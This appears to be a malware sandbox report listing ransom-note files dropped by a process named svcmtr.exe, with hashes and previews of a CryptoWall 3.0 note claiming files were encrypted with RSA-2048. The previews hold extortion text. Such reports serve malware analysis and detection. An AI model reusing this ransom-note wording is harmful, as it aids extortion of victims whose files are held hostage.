                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Crypto\PCPKSP\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Crypto\RSA\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Crypto\RSA\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Crypto\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Crypto\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\DRM\Server\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\DRM\Server\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\DRM\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\DRM\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Device Stage\Device\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Device Stage\Task\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Device Stage\Task\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Device Stage\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Device Stage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\DeviceSync\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
